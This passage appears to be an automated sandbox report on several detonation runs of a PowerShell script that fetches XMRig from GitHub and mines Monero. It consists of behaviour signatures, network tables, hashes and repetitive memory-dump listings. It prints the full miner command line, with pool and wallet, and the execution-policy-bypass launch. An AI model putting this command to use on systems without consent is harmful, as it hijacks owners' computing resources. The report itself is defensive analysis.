| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 4312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 4312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4988-5-0x000002B06B740000-0x000002B06B762000-memory.dmp
memory/4988-8-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-9-0x000002B06BA50000-0x000002B06BAC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br0sl1es.wfz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-48-0x000002B06BA10000-0x000002B06BA22000-memory.dmp
memory/4988-61-0x000002B06B790000-0x000002B06B79A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4312-90-0x0000015E4BB30000-0x0000015E4BB50000-memory.dmp
memory/4312-91-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4988-92-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4312-93-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-96-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4312-97-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-98-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-99-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-100-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-101-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-102-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-103-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-104-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-105-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-106-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-107-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-108-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-109-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-110-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-111-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-112-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-113-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-114-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-115-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-116-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-117-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-118-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-119-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-120-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-121-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-122-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-123-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-124-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-125-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-126-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-127-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-128-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-129-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-130-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-131-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-132-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-133-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-134-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-135-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-136-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-137-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-138-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-139-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-140-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-141-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-142-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-143-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-144-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-145-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-146-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-147-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-148-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-149-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-150-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-151-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-152-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-153-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-154-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-155-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-156-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
memory/4312-157-0x00007FF760090000-0x00007FF760CC3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:18
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1092 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1092 wrote to memory of 3052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1092-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idbeawvs.yes.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1092-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-9-0x0000029DB58E0000-0x0000029DB5902000-memory.dmp
memory/1092-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/1092-14-0x0000029DCDF40000-0x0000029DCDF52000-memory.dmp
memory/1092-15-0x0000029DCDF20000-0x0000029DCDF2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3052-46-0x0000021522F10000-0x0000021522F30000-memory.dmp
memory/3052-47-0x0000021522F70000-0x0000021522F90000-memory.dmp
memory/1092-49-0x00007FFA49283000-0x00007FFA49285000-memory.dmp
memory/1092-50-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/3052-48-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-53-0x00000215B7400000-0x00000215B7420000-memory.dmp
memory/3052-52-0x0000021522F90000-0x0000021522FB0000-memory.dmp
memory/3052-51-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/1092-54-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp
memory/3052-55-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-56-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-58-0x00000215B7400000-0x00000215B7420000-memory.dmp
memory/3052-57-0x0000021522F90000-0x0000021522FB0000-memory.dmp
memory/3052-59-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-60-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-61-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-62-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-63-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-64-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-65-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-66-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-67-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-68-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-69-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-70-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-71-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-72-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-73-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-74-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-75-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-76-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-77-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-78-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-79-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-80-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-81-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-82-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-83-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-84-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-85-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-86-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-87-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-88-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-89-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-90-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-91-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-92-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-93-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-94-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-95-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-96-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-97-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-98-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-99-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-100-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-101-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-102-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-103-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-104-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-105-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-106-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-107-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-108-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-109-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-110-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-111-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-112-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-113-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-114-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-115-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-116-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
memory/3052-117-0x00007FF68B570000-0x00007FF68C1A3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:26
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1755s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2656 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2656 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
memory/2656-0-0x00007FF95A033000-0x00007FF95A035000-memory.dmp
memory/2656-1-0x000002A327890000-0x000002A3278B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzmgrmov.zl4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2656-11-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-12-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-14-0x00007FF95A030000-0x00007FF95AAF1000-memory.dmp
memory/2656-15-0x000002A327A20000-0x000002A327A32000-memory.dmp
memory/2656-16-0x000002A327A10000-0x000002A327A1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:26
Platform
win10-20240404-en
Max time kernel
1793s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1964 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1964 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
